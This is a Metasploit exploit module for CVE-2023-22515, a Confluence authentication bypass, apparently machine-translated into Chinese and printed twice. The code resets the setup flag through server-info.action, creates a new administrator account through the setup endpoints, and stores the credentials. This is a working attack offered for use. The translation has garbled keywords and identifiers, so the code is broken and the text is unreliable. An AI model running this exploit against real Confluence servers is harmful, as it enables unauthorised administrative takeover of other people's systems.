##
#此模块需要Metasploit: https://metasploit.com/download
#当前源: https://github.com/RAPID7/METASPLOIT-FRAMEWORK
##
类MSF:AUXILARIY
预先预期MSF:EXPLOIT:REMOTE3:3360AUTOCHECK
包括MSF:EXPLOIT:REMOTE3:HTTPCLCCLIENT
def初始化(info={})
极好的(
update_info(
信息,
'name'='Atlassian Confluence数据中心和服务器身份验证旁路通过破损的访问控制',
'description'=%q {
该模块利用了Atlassian Confluence服务器中损坏的访问控制漏洞,导致身份验证旁路。
可以在目标Atlassian服务器上进行身份验证的情况下创建专门制作的请求。
},
'作者'=[
“未知”,#在野外剥削
'emir polat'#metasploit模块
],
'参考'=[
['cve','2023-22515'],
['url','https://confluence.atlassian.com/se...erver-server-server-server-server-12956822276
['url','https://nvd.nist.gov/vuln/detail/cve-2023-22515'],],
['url','https://attackerkb.com/topics/q5f0itszw5/cve-2023-22515/rapid7-analysis']
],
'Dibleosuretate'='2023-10-04',
'DefaultOptions'={
'rport'=8090
},
'许可证'=msf_license,
'notes'={
'稳定性'=[crash_safe],
'可靠性'=[repoyable_session],
'sidefects'=[ioc_in_logs,config_changes]
}
)
)
register_options([
optString.new('targeturi',[true,'基本路径','/']),
optString.new('new_username',[true,'具有管理员特权创建新用户时要使用的用户名',faker3:3:internet.username],regex3: /^
optString.new('new_password',[true,'具有管理特权的新用户时要使用的密码'
optString.new('new_email',[true,'用管理特权创建新用户时要使用的电子邮件',faker3:internet.email])
)))
结尾
DEF检查
res=send_request_cgi(
'方法'='get',
'uri'=normalize_uri(target_uri.path,'/login.action')
)
返回exploit3:checkcode3:unknown除非res
返回exploit3:3360checkcode3:safe,除非res.code==200
poweredby=res.get_xml_document.xpath('//ul [@id='poweredby']/li [@class='print-inly']/text()')。first.text
返回exploit3:checkcode3:safe除非poweredby=〜 /confluence(\ d+(\ d+(\。\ d+))) /
contruence_version=rex:version.new(regexp.last_match(1))
vprint_status('检测到的汇集版本:#{confluence_version}')
如果contruence_version.between?(rex:version.new('8.0.0'),rex33:3:version.new('8.3.2')||
contruence_version.between?(rex:version.new('8.4.0'),rex33:3:version.new('8.4.2')||
contruence_version.between?(rex:version.new('8.5.0'),rex3:3:version.new('8.5.1'))
返回exploit3:checkcode3:appears('contruence 3:#{contruence_version}'的'可利用版本
结尾
exploit3:3360checkcode:3:SAFE('Confluence版本3:#{contruence_version}')
结尾
def运行
res=send_request_cgi(
'方法'='get',
'uri'=normalize_uri(target_uri.path,'/server-info.action'),
'vars_get'={
'bootstrapstatusprovider.applicationconfig.setupcomplete'='false'
}
)
返回fail_with(MSF:EXPLOIT33:FAILURE:UNEXPECTEDREPTER,“版本ablesable and ablesause and aborable and setup noted'')除非res.code.code==302 || res.code==200
print_good('找到的服务器info.action!试图忽略设置。')
create_user=create_admin_user
res=send_request_cgi(
'方法'='post',
'uri'=normalize_uri(target_uri.path,'setup/finishsetup.action'),
'标题'={
'x-atlassian-token'='无检查
}
)
返回fail_with(MSF:EXPLOIT3:FAILURE:33:NOACCESS,“无法创建管理用户。
print_warning(创建了admin用户,但无法完成设置。”)除非res.code==200
create_credential({
workspace_id: myworkspace_id,
Origin_Type:服务,
module_fullname: fullname,
username: datastore ['new_username'],
private_type
assword,
private_data:数据存储['new_password'],
service_name:'Atlassian Confluence',
地址:数据存储['rhost'],
port:数据存储['rport'],
协议:'TCP',
状态: Metasploit:Model3:Login3:3:Status:untried
}))
print_good('admin用户成功创建了。
print_good('现在您可以从: http://#{datastore ['rhosts']} :#{datastore ['rport']}#dataTastore ['targeturi'] login.action')
结尾
def create_admin_user
res=send_request_cgi(
'方法'='post',
'uri'=normalize_uri(target_uri.path,'setup/setupadministrator.action'),
'标题'={
'x-atlassian-token'='无检查
},
'vars_post'={
'用户名'=datastore ['new_username'],
'fullname'=“新管理员”,
'email'=datastore ['new_email'],
'密码'=datastore ['new_password'],
'确认'=datastore ['new_password'],
'setup-next-button'='next'
}
)
res.code==302
结尾
结尾
#此模块需要Metasploit: https://metasploit.com/download
#当前源: https://github.com/RAPID7/METASPLOIT-FRAMEWORK
##
类MSF:AUXILARIY
预先预期MSF:EXPLOIT:REMOTE3:3360AUTOCHECK
包括MSF:EXPLOIT:REMOTE3:HTTPCLCCLIENT
def初始化(info={})
极好的(
update_info(
信息,
'name'='Atlassian Confluence数据中心和服务器身份验证旁路通过破损的访问控制',
'description'=%q {
该模块利用了Atlassian Confluence服务器中损坏的访问控制漏洞,导致身份验证旁路。
可以在目标Atlassian服务器上进行身份验证的情况下创建专门制作的请求。
},
'作者'=[
“未知”,#在野外剥削
'emir polat'#metasploit模块
],
'参考'=[
['cve','2023-22515'],
['url','https://confluence.atlassian.com/se...erver-server-server-server-server-12956822276
['url','https://nvd.nist.gov/vuln/detail/cve-2023-22515'],],
['url','https://attackerkb.com/topics/q5f0itszw5/cve-2023-22515/rapid7-analysis']
],
'Dibleosuretate'='2023-10-04',
'DefaultOptions'={
'rport'=8090
},
'许可证'=msf_license,
'notes'={
'稳定性'=[crash_safe],
'可靠性'=[repoyable_session],
'sidefects'=[ioc_in_logs,config_changes]
}
)
)
register_options([
optString.new('targeturi',[true,'基本路径','/']),
optString.new('new_username',[true,'具有管理员特权创建新用户时要使用的用户名',faker3:3:internet.username],regex3: /^
optString.new('new_password',[true,'具有管理特权的新用户时要使用的密码'
optString.new('new_email',[true,'用管理特权创建新用户时要使用的电子邮件',faker3:internet.email])
)))
结尾
DEF检查
res=send_request_cgi(
'方法'='get',
'uri'=normalize_uri(target_uri.path,'/login.action')
)
返回exploit3:checkcode3:unknown除非res
返回exploit3:3360checkcode3:safe,除非res.code==200
poweredby=res.get_xml_document.xpath('//ul [@id='poweredby']/li [@class='print-inly']/text()')。first.text
返回exploit3:checkcode3:safe除非poweredby=〜 /confluence(\ d+(\ d+(\。\ d+))) /
contruence_version=rex:version.new(regexp.last_match(1))
vprint_status('检测到的汇集版本:#{confluence_version}')
如果contruence_version.between?(rex:version.new('8.0.0'),rex33:3:version.new('8.3.2')||
contruence_version.between?(rex:version.new('8.4.0'),rex33:3:version.new('8.4.2')||
contruence_version.between?(rex:version.new('8.5.0'),rex3:3:version.new('8.5.1'))
返回exploit3:checkcode3:appears('contruence 3:#{contruence_version}'的'可利用版本
结尾
exploit3:3360checkcode:3:SAFE('Confluence版本3:#{contruence_version}')
结尾
def运行
res=send_request_cgi(
'方法'='get',
'uri'=normalize_uri(target_uri.path,'/server-info.action'),
'vars_get'={
'bootstrapstatusprovider.applicationconfig.setupcomplete'='false'
}
)
返回fail_with(MSF:EXPLOIT33:FAILURE:UNEXPECTEDREPTER,“版本ablesable and ablesause and aborable and setup noted'')除非res.code.code==302 || res.code==200
print_good('找到的服务器info.action!试图忽略设置。')
create_user=create_admin_user
res=send_request_cgi(
'方法'='post',
'uri'=normalize_uri(target_uri.path,'setup/finishsetup.action'),
'标题'={
'x-atlassian-token'='无检查
}
)
返回fail_with(MSF:EXPLOIT3:FAILURE:33:NOACCESS,“无法创建管理用户。
print_warning(创建了admin用户,但无法完成设置。”)除非res.code==200
create_credential({
workspace_id: myworkspace_id,
Origin_Type:服务,
module_fullname: fullname,
username: datastore ['new_username'],
private_type
assword,private_data:数据存储['new_password'],
service_name:'Atlassian Confluence',
地址:数据存储['rhost'],
port:数据存储['rport'],
协议:'TCP',
状态: Metasploit:Model3:Login3:3:Status:untried
}))
print_good('admin用户成功创建了。
print_good('现在您可以从: http://#{datastore ['rhosts']} :#{datastore ['rport']}#dataTastore ['targeturi'] login.action')
结尾
def create_admin_user
res=send_request_cgi(
'方法'='post',
'uri'=normalize_uri(target_uri.path,'setup/setupadministrator.action'),
'标题'={
'x-atlassian-token'='无检查
},
'vars_post'={
'用户名'=datastore ['new_username'],
'fullname'=“新管理员”,
'email'=datastore ['new_email'],
'密码'=datastore ['new_password'],
'确认'=datastore ['new_password'],
'setup-next-button'='next'
}
)
res.code==302
结尾
结尾